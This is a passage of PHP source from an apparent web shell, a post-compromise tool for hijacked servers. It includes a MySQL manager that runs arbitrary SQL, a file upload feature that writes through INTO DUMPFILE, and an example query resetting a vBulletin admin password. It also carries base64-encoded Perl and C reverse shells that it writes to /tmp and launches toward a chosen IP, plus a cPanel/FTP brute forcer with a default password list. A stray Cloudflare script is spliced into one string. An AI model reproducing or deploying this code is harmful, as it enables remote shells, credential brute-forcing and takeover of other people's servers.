 681         if (file_exists($savepath)) {
 682             m('The goal file has already existed');
 683         } else {
 684             if (!$filename) {
 685                 m('Please choose a file');
 686             } else {
 687                 $fp = @fopen($filename, 'r');
 688                 $contents = @fread($fp, filesize($filename));
 689                 @fclose($fp);
 690                 $contents = bin2hex($contents);
 691                 if (!$upname) $upname = $file['name'];
 692                 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
 693                 $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
 694                 m($result ? 'Upload success' : 'Upload has failed: ' . mysql_error());
 695             }
 696         }
 697     }
 698 ?>
 699 <script type="text/javascript">
 700 function mysqlfile(doing){
 701    if(!doing) return;
 702    $('doing').value=doing;
 703    $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
 704    $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
 705    $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
 706    $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
 707    $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
 708    $('mysqlfile').charset.value=$('dbinfo').charset.value;
 709    $('mysqlfile').submit();
 710 }
 711 </script>
 712 <?php
 713     !$dbhost && $dbhost = 'localhost';
 714     !$dbuser && $dbuser = 'root';
 715     !$dbport && $dbport = '3306';
 716     $charsets = array('' => 'Default', 'gbk' => 'GBK', 'big5' => 'Big5', 'utf8' => 'UTF-8', 'latin1' => 'Latin1');
 717     formhead(array('title' => 'MYSQL Information', 'name' => 'dbinfo'));
 718     makehide('action', 'sqlfile');
 719     p('<p>');
 720     p('DBHost:');
 721     makeinput(array('name' => 'dbhost', 'size' => 20, 'value' => $dbhost));
 722     p(':');
 723     makeinput(array('name' => 'dbport', 'size' => 4, 'value' => $dbport));
 724     p('DBUser:');
 725     makeinput(array('name' => 'dbuser', 'size' => 15, 'value' => $dbuser));
 726     p('DBPass:');
 727     makeinput(array('name' => 'dbpass', 'size' => 15, 'value' => $dbpass));
 728     p('DBName:');
 729     makeinput(array('name' => 'dbname', 'size' => 15, 'value' => $dbname));
 730     p('DBCharset:');
 731     makeselect(array('name' => 'charset', 'option' => $charsets, 'selected' => $charset));
 732     p('</p>');
 733     formfoot();
 734     p('<form action="' . $self . '" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
 735     p('<h2>Upload file</h2>');
 736     p('<p><b>This operation the DB user must has FILE privilege</b></p>');
 737     p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
 738     p('<h2>Download file</h2>');
 739     p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
 740     makehide('dbhost');
 741     makehide('dbport');
 742     makehide('dbuser');
 743     makehide('dbpass');
 744     makehide('dbname');
 745     makehide('charset');
 746     makehide('doing');
 747     makehide('action', 'sqlfile');
 748     p('</form>');
 749 } elseif ($action == 'sqladmin') {
 750     !$dbhost && $dbhost = 'localhost';
 751     !$dbuser && $dbuser = 'root';
 752     !$dbport && $dbport = '3306';
 753     $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
 754     if (isset($dbhost)) {
 755         $dbform.= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
 756     }
 757     if (isset($dbuser)) {
 758         $dbform.= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
 759     }
 760     if (isset($dbpass)) {
 761         $dbform.= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
 762     }
 763     if (isset($dbport)) {
 764         $dbform.= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
 765     }
 766     if (isset($dbname)) {
 767         $dbform.= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
 768     }
 769     if (isset($charset)) {
 770         $dbform.= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
 771     }
 772     if ($doing == 'backupmysql' && $saveasfile) {
 773         if (!$table) {
 774             m('Please choose the table');
 775         } else {
 776             dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
 777             $table = array_flip($table);
 778             $fp = @fopen($path, 'w');
 779             if ($fp) {
 780                 $result = q('SHOW tables');
 781                 if (!$result) p('<h2>' . mysql_error() . '</h2>');
 782                 $mysqldata = '';
 783                 while ($currow = mysql_fetch_array($result)) {
 784                     if (isset($table[$currow[0]])) {
 785                         sqldumptable($currow[0], $fp);
 786                     }
 787                 }
 788                 fclose($fp);
 789                 $fileurl = str_replace(SA_ROOT, '', $path);
 790                 m('Database has success backup to <a href="' . $fileurl . '" target="_blank">' . $path . '</a>');
 791                 mysql_close();
 792             } else {
 793                 m('Backup failed');
 794             }
 795         }
 796     }
 797     if ($insert && $insertsql) {
 798         $keystr = $valstr = $tmp = '';
 799         foreach ($insertsql as $key => $val) {
 800             if ($val) {
 801                 $keystr.= $tmp . $key;
 802                 $valstr.= $tmp . "'" . addslashes($val) . "'";
 803                 $tmp = ',';
 804             }
 805         }
 806         if ($keystr && $valstr) {
 807             dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
 808             m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
 809         }
 810     }
 811     if ($update && $insertsql && $base64) {
 812         $valstr = $tmp = '';
 813         foreach ($insertsql as $key => $val) {
 814             $valstr.= $tmp . $key . "='" . addslashes($val) . "'";
 815             $tmp = ',';
 816         }
 817         if ($valstr) {
 818             $where = base64_decode($base64);
 819             dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
 820             m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
 821         }
 822     }
 823     if ($doing == 'del' && $base64) {
 824         $where = base64_decode($base64);
 825         $delete_sql = "DELETE FROM $tablename WHERE $where";
 826         dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
 827         m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
 828     }
 829     if ($tablename && $doing == 'drop') {
 830         dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
 831         if (q("DROP TABLE $tablename")) {
 832             m('Drop table of success');
 833             $tablename = '';
 834         } else {
 835             m(mysql_error());
 836         }
 837     }
 838     $charsets = array('' => 'Default', 'gbk' => 'GBK', 'big5' => 'Big5', 'utf8' => 'UTF-8', 'latin1' => 'Latin1');
 839     formhead(array('title' => 'MYSQL Manager'));
 840     makehide('action', 'sqladmin');
 841     p('<p>');
 842     p('DBHost:');
 843     makeinput(array('name' => 'dbhost', 'size' => 20, 'value' => $dbhost));
 844     p(':');
 845     makeinput(array('name' => 'dbport', 'size' => 4, 'value' => $dbport));
 846     p('DBUser:');
 847     makeinput(array('name' => 'dbuser', 'size' => 15, 'value' => $dbuser));
 848     p('DBPass:');
 849     makeinput(array('name' => 'dbpass', 'size' => 15, 'value' => $dbpass));
 850     p('DBCharset:');
 851     makeselect(array('name' => 'charset', 'option' => $charsets, 'selected' => $charset));
 852     makeinput(array('name' => 'connect', 'value' => 'Connect', 'type' => 'submit', 'class' => 'bt'));
 853     p('</p>');
 854     formfoot();
 855 ?>
 856 <script type="text/javascript">
 857 function editrecord(action, base64, tablename){
 858   if (action == 'del') {
 859       if (!confirm('Is or isn\'t deletion record?')) return;
 860   }
 861   $('recordlist').doing.value=action;
 862   $('recordlist').base64.value=base64;
 863   $('recordlist').tablename.value=tablename;
 864   $('recordlist').submit();
 865 }
 866 function moddbname(dbname) {
 867   if(!dbname) return;
 868   $('setdbname').dbname.value=dbname;
 869   $('setdbname').submit();
 870 }
 871 function settable(tablename,doing,page) {
 872   if(!tablename) return;
 873   if (doing) {
 874       $('settable').doing.value=doing;
 875   }
 876   if (page) {
 877       $('settable').page.value=page;
 878   }
 879   $('settable').tablename.value=tablename;
 880   $('settable').submit();
 881 }
 882 </script>
 883 <?php
 884     // SQL
 885     formhead(array('name' => 'recordlist'));
 886     makehide('doing');
 887     makehide('action', 'sqladmin');
 888     makehide('base64');
 889     makehide('tablename');
 890     p($dbform);
 891     formfoot();
 892     // Data
 893     formhead(array('name' => 'setdbname'));
 894     makehide('action', 'sqladmin');
 895     p($dbform);
 896     if (!$dbname) {
 897         makehide('dbname');
 898     }
 899     formfoot();
 900     formhead(array('name' => 'settable'));
 901     makehide('action', 'sqladmin');
 902     p($dbform);
 903     makehide('tablename');
 904     makehide('page', $page);
 905     makehide('doing');
 906     formfoot();
 907     $cachetables = array();
 908     $pagenum = 30;
 909     $page = intval($page);
 910     if ($page) {
 911         $start_limit = ($page - 1) * $pagenum;
 912     } else {
 913         $start_limit = 0;
 914         $page = 1;
 915     }
 916     if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
 917         dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
 918         // get mysql server
 919         $mysqlver = mysql_get_server_info();
 920         p('<p>MySQL ' . $mysqlver . ' running in ' . $dbhost . ' as ' . $dbuser . '@' . $dbhost . '</p>');
 921         $highver = $mysqlver > '4.1' ? 1 : 0;
 922         // Show database
 923         $query = q("SHOW DATABASES");
 924         $dbs = array();
 925         $dbs[] = '-- Select a database --';
 926         while ($db = mysql_fetch_array($query)) {
 927             $dbs[$db['Database']] = $db['Database'];
 928         }
 929         makeselect(array('title' => 'Please select a database:', 'name' => 'db[]', 'option' => $dbs, 'selected' => $dbname, 'onchange' => 'moddbname(this.options[this.selectedIndex].value)', 'newline' => 1));
 930         $tabledb = array();
 931         if ($dbname) {
 932             p('<p>');
 933             p('Current dababase: <a href="javascript:moddbname(\'' . $dbname . '\');">' . $dbname . '</a>');
 934             if ($tablename) {
 935                 p(' | Current Table: <a href="javascript:settable(\'' . $tablename . '\');">' . $tablename . '</a> [ <a href="javascript:settable(\'' . $tablename . '\', \'insert\');">Insert</a> | <a href="javascript:settable(\'' . $tablename . '\', \'structure\');">Structure</a> | <a href="javascript:settable(\'' . $tablename . '\', \'drop\');">Drop</a> ]');
 936             }
 937             p('</p>');
 938             mysql_select_db($dbname);
 939             $getnumsql = '';
 940             $runquery = 0;
 941             if ($sql_query) {
 942                 $runquery = 1;
 943             }
 944             $allowedit = 0;
 945             if ($tablename && !$sql_query) {
 946                 $sql_query = "SELECT * FROM $tablename";
 947                 $getnumsql = $sql_query;
 948                 $sql_query = $sql_query . " LIMIT $start_limit, $pagenum";
 949                 $allowedit = 1;
 950             }
 951             p('<form action="' . $self . '" method="POST">');
 952             p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database <font color=red><b>' . $dbname . '</font></b>:<BR>Example VBB Password: <font color=red>vbateam</font><BR><font color=yellow>UPDATE `user` SET `password` = \'69e53e5ab9536e55d31ff533aefc4fbe\', salt = \'p5T\' WHERE `userid` = \'1\' </font>
 953           </td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">' . htmlspecialchars($sql_query, ENT_QUOTES) . '</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
 954             makehide('tablename', $tablename);
 955             makehide('action', 'sqladmin');
 956             p($dbform);
 957             p('</form>');
 958             if ($tablename || ($runquery && $sql_query)) {
 959                 if ($doing == 'structure') {
 960                     $result = q("SHOW COLUMNS FROM $tablename");
 961                     $rowdb = array();
 962                     while ($row = mysql_fetch_array($result)) {
 963                         $rowdb[] = $row;
 964                     }
 965                     p('<table border="0" cellpadding="3" cellspacing="0">');
 966                     p('<tr class="head">');
 967                     p('<td>Field</td>');
 968                     p('<td>Type</td>');
 969                     p('<td>Null</td>');
 970                     p('<td>Key</td>');
 971                     p('<td>Default</td>');
 972                     p('<td>Extra</td>');
 973                     p('</tr>');
 974                     foreach ($rowdb as $row) {
 975                         $thisbg = bg();
 976                         p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
 977                         p('<td>' . $row['Field'] . '</td>');
 978                         p('<td>' . $row['Type'] . '</td>');
 979                         p('<td>' . $row['Null'] . '&nbsp;</td>');
 980                         p('<td>' . $row['Key'] . '&nbsp;</td>');
 981                         p('<td>' . $row['Default'] . '&nbsp;</td>');
 982                         p('<td>' . $row['Extra'] . '&nbsp;</td>');
 983                         p('</tr>');
 984                     }
 985                     tbfoot();
 986                 } elseif ($doing == 'insert' || $doing == 'edit') {
 987                     $result = q('SHOW COLUMNS FROM ' . $tablename);
 988                     while ($row = mysql_fetch_array($result)) {
 989                         $rowdb[] = $row;
 990                     }
 991                     $rs = array();
 992                     if ($doing == 'insert') {
 993                         p('<h2>Insert new line in ' . $tablename . ' table &raquo;</h2>');
 994                     } else {
 995                         p('<h2>Update record in ' . $tablename . ' table &raquo;</h2>');
 996                         $where = base64_decode($base64);
 997                         $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
 998                         $rs = mysql_fetch_array($result);
 999                     }
1000                     p('<form method="post" action="' . $self . '">');
1001                     p($dbform);
1002                     makehide('action', 'sqladmin');
1003                     makehide('tablename', $tablename);
1004                     p('<table border="0" cellpadding="3" cellspacing="0">');
1005                     foreach ($rowdb as $row) {
1006                         if ($rs[$row['Field']]) {
1007                             $value = htmlspecialchars($rs[$row['Field']]);
1008                         } else {
1009                             $value = '';
1010                         }
1011                         $thisbg = bg();
1012                         p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1013                         p('<td><b>' . $row['Field'] . '</b><br />' . $row['Type'] . '</td><td><textarea class="area" name="insertsql[' . $row['Field'] . ']" style="width:500px;height:60px;overflow:auto;">' . $value . '</textarea></td></tr>');
1014                     }
1015                     if ($doing == 'insert') {
1016                         p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
1017                     } else {
1018                         p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
1019                         makehide('base64', $base64);
1020                     }
1021                     p('</table></form>');
1022                 } else {
1023                     $querys = @explode(';', $sql_query);
1024                     foreach ($querys as $num => $query) {
1025                         if ($query) {
1026                             p("<p><b>Query#{$num} : " . htmlspecialchars($query, ENT_QUOTES) . "</b></p>");
1027                             switch (qy($query)) {
1028                                 case 0:
1029                                     p('<h2>Error : ' . mysql_error() . '</h2>');
1030                                 break;
1031                                 case 1:
1032                                     if (strtolower(substr($query, 0, 13)) == 'select * from') {
1033                                         $allowedit = 1;
1034                                     }
1035                                     if ($getnumsql) {
1036                                         $tatol = mysql_num_rows(q($getnumsql));
1037                                         $multipage = multi($tatol, $pagenum, $page, $tablename);
1038                                     }
1039                                     if (!$tablename) {
1040                                         $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
1041                                         $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
1042                                         preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i", $sql_line, $matches);
1043                                         $tablename = $matches[1][0];
1044                                     }
1045                                     $result = q($query);
1046                                     p($multipage);
1047                                     p('<table border="0" cellpadding="3" cellspacing="0">');
1048                                     p('<tr class="head">');
1049                                     if ($allowedit) p('<td>Action</td>');
1050                                     $fieldnum = @mysql_num_fields($result);
1051                                     for ($i = 0;$i < $fieldnum;$i++) {
1052                                         $name = @mysql_field_name($result, $i);
1053                                         $type = @mysql_field_type($result, $i);
1054                                         $len = @mysql_field_len($result, $i);
1055                                         p("<td nowrap>$name<br><span>$type($len)</span></td>");
1056                                     }
1057                                     p('</tr>');
1058                                     while ($mn = @mysql_fetch_assoc($result)) {
1059                                         $thisbg = bg();
1060                                         p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1061                                         $where = $tmp = $b1 = '';
1062                                         foreach ($mn as $key => $inside) {
1063                                             if ($inside) {
1064                                                 $where.= $tmp . $key . "='" . addslashes($inside) . "'";
1065                                                 $tmp = ' AND ';
1066                                             }
1067                                             $b1.= '<td nowrap>' . html_clean($inside) . '&nbsp;</td>';
1068                                         }
1069                                         $where = base64_encode($where);
1070                                         if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \'' . $where . '\', \'' . $tablename . '\');">Edit</a> | <a href="javascript:editrecord(\'del\', \'' . $where . '\', \'' . $tablename . '\');">Del</a></td>');
1071                                         p($b1);
1072                                         p('</tr>');
1073                                         unset($b1);
1074                                     }
1075                                     tbfoot();
1076                                     p($multipage);
1077                                     break;
1078                                 case 2:
1079                                     $ar = mysql_affected_rows();
1080                                     p('<h2>affected rows : <b>' . $ar . '</b></h2>');
1081                                     break;
1082                                 }
1083                             }
1084                     }
1085                 }
1086             } else {
1087                 $query = q("SHOW TABLE STATUS");
1088                 $table_num = $table_rows = $data_size = 0;
1089                 $tabledb = array();
1090                 while ($table = mysql_fetch_array($query)) {
1091                     $data_size = $data_size + $table['Data_length'];
1092                     $table_rows = $table_rows + $table['Rows'];
1093                     $table['Data_length'] = sizecount($table['Data_length']);
1094                     $table_num++;
1095                     $tabledb[] = $table;
1096                 }
1097                 $data_size = sizecount($data_size);
1098                 unset($table);
1099                 p('<table border="0" cellpadding="0" cellspacing="0">');
1100                 p('<form action="' . $self . '" method="POST">');
1101                 makehide('action', 'sqladmin');
1102                 p($dbform);
1103                 p('<tr class="head">');
1104                 p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
1105                 p('<td>Name</td>');
1106                 p('<td>Rows</td>');
1107                 p('<td>Data_length</td>');
1108                 p('<td>Create_time</td>');
1109                 p('<td>Update_time</td>');
1110                 if ($highver) {
1111                     p('<td>Engine</td>');
1112                     p('<td>Collation</td>');
1113                 }
1114                 p('</tr>');
1115                 foreach ($tabledb as $key => $table) {
1116                     $thisbg = bg();
1117                     p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1118                     p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="' . $table['Name'] . '" /></td>');
1119                     p('<td><a href="javascript:settable(\'' . $table['Name'] . '\');">' . $table['Name'] . '</a> [ <a href="javascript:settable(\'' . $table['Name'] . '\', \'insert\');">Insert</a> | <a href="javascript:settable(\'' . $table['Name'] . '\', \'structure\');">Structure</a> | <a href="javascript:settable(\'' . $table['Name'] . '\', \'drop\');">Drop</a> ]</td>');
1120                     p('<td>' . $table['Rows'] . '</td>');
1121                     p('<td>' . $table['Data_length'] . '</td>');
1122                     p('<td>' . $table['Create_time'] . '</td>');
1123                     p('<td>' . $table['Update_time'] . '</td>');
1124                     if ($highver) {
1125                         p('<td>' . $table['Engine'] . '</td>');
1126                         p('<td>' . $table['Collation'] . '</td>');
1127                     }
1128                     p('</tr>');
1129                 }
1130                 p('<tr class=fout>');
1131                 p('<td>&nbsp;</td>');
1132                 p('<td>Total tables: ' . $table_num . '</td>');
1133                 p('<td>' . $table_rows . '</td>');
1134                 p('<td>' . $data_size . '</td>');
1135                 p('<td colspan="' . ($highver ? 4 : 2) . '">&nbsp;</td>');
1136                 p('</tr>');
1137                 p("<tr class=\"fout\"><td colspan=\"" . ($highver ? 8 : 6) . "\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"" . SA_ROOT . $_SERVER['HTTP_HOST'] . "_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
1138                 makehide('doing', 'backupmysql');
1139                 formfoot();
1140                 p("</table>");
1141                 fr($query);
1142             }
1143         }
1144     }
1145     tbfoot();
1146     @mysql_close();
1147 } //end sql backup
1148 elseif ($action == 'backconnect') {
1149     !$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
1150     !$yourport && $yourport = '12345';
1151     $usedb = array('perl' => 'perl', 'c' => 'c');
1152     $back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1153     $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1154     if ($start && $yourip && $yourport && $use) {
1155         if ($use == 'perl') {
1156             cf('/tmp/angel_bc', $back_connect);
1157             $res = execute(which('perl') . " /tmp/angel_bc $yourip $yourport &");
1158         } else {
1159             cf('/tmp/angel_bc.c', $back_connect_c);
1160             $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
1161             @unlink('/tmp/angel_bc.c');
1162             $res = execute("/tmp/angel_bc $yourip $yourport &");
1163         }
1164         m("Now script try connect to $yourip port $yourport ...");
1165     }
1166     formhead(array('title' => 'Back Connect'));
1167     makehide('action', 'backconnect');
1168     p('<p>');
1169     p('Your IP:');
1170     makeinput(array('name' => 'yourip', 'size' => 20, 'value' => $yourip));
1171     p('Your Port:');
1172     makeinput(array('name' => 'yourport', 'size' => 15, 'value' => $yourport));
1173     p('Use:');
1174     makeselect(array('name' => 'use', 'option' => $usedb, 'selected' => $use));
1175     makeinput(array('name' => 'start', 'value' => 'Start', 'type' => 'submit', 'class' => 'bt'));
1176     p('</p>');
1177     formfoot();
1178 } //end backconnect window via NC
1179 // Brute
1180 elseif ($action == 'brute') {
1181     formhead(array('title' => 'Brute Forcer'));
1182     makehide('action', 'brute');
1183     makehide('dir', $brute);
1184     @ini_set('memory_limit', 1000000000000);
1185     $connect_timeout = 5;
1186     @set_time_limit(0);
1187     $submit = $_REQUEST['submit'];
1188     $users = $_REQUEST['users'];
1189     $pass = $_REQUEST['passwords'];
1190     $target = $_REQUEST['target'];
1191     $option = $_REQUEST['option'];
1192     $passlist = "0123456
1193 01234567
1194 012345678
1195 0123456789
1196 01234567890
1197 123456
1198 1234567
1199 12345678
1200 123456789
1201 1234567890
1202 111111
1203 000000
1204 222222
1205 333333
1206 444444
1207 555555
1208 666666
1209 777777
1210 888888
1211 999999
1212 123123
1213 456456
1214 789789
1215 123321
1216 456654
1217 654321
1218 7654321
1219 87654321
1220 987654321
1221 0987654321
1222 admin
1223 administrator
1224 admincp
1225 cpanel
1226 adminx
1227 admins
1228 password
1229 passwords
1230 passw0rd
1231 p@ssw0rd
1232 p@ssword
1233 khongco
1234 25251325
1235 passw0rds";
1236     if ($target == '') {
1237         $target = 'localhost';
1238     }
1239     print " <div align='center'>
1240 <form method='post' style='border: 1px solid #000000'><br><br>
1241 <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#966117 border=1><tr><td>
1242 <b> Target  : </font><input type='text' name='target' size='16' value= $target style='border: font-family:tahoma; font-weight:bold;'></p></font></b></p>
1243 <div align='center'><br>
1244 <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#966117 border=1>
1245 <tr>
1246 <td align='center'>
1247 <b>Username</b></td>
1248 <td>
1249 <p align='center'>
1250 <b>Password</b></td>
1251 </tr>
1252 </table>
1253 <p align='center'>
1254 <textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>";
1255     $i = 0;
1256     while ($i < 60000) {
1257         $line = posix_getpwuid($i);
1258         if (!empty($line)) {
1259             while (list($key, $vba_etcpwd) = each($line)) {
1260                 echo "" . $vba_etcpwd . "\n";
1261                 break;
1262             }
1263         }
1264         $i++;
1265     }
1266     echo "
1267 </textarea>
1268 <textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$passlist</textarea><br>
1269 <br>
1270 <b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
1271 <input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='Attack' name='submit' ></p>
1272 </td></tr></table></td></tr></form><p align= 'left'>";
1273 ?>
1274 <?php
1275     function ftp_check($host, $user, $pass, $timeout) {
1276         $ch = curl_init();
1277         curl_setopt($ch, CURLOPT_URL, "ftp://$host");
1278         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1279         curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1280         curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
1281         curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1282         curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1283         curl_setopt($ch, CURLOPT_FAILONERROR, 1);
1284         $data = curl_exec($ch);
1285         if (curl_errno($ch) == 28) {
1286             print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1287             exit;
1288         } elseif (curl_errno($ch) == 0) {
1289             p("<b>[ attack@vbateam.net
1290 /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */ ]# </b>
1291 <b> Attacking has been done! Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font> => <a href=http://$user:$pass@$host:2082 target=_blank>Login</a></b><br>");
1292         }
1293         curl_close($ch);
1294     }
1295     function cpanel_check($host, $user, $pass, $timeout) {
1296         $ch = curl_init();
1297         curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
1298         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1299         curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1300         curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1301         curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1302         curl_setopt($ch, CURLOPT_FAILONERROR, 1);
1303         $data = curl_exec($ch);
1304         if (curl_errno($ch) == 28) {
1305             print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1306             exit;
1307         } elseif (curl_errno($ch) == 0) {
1308             p("<b>[ attack@vbateam.net
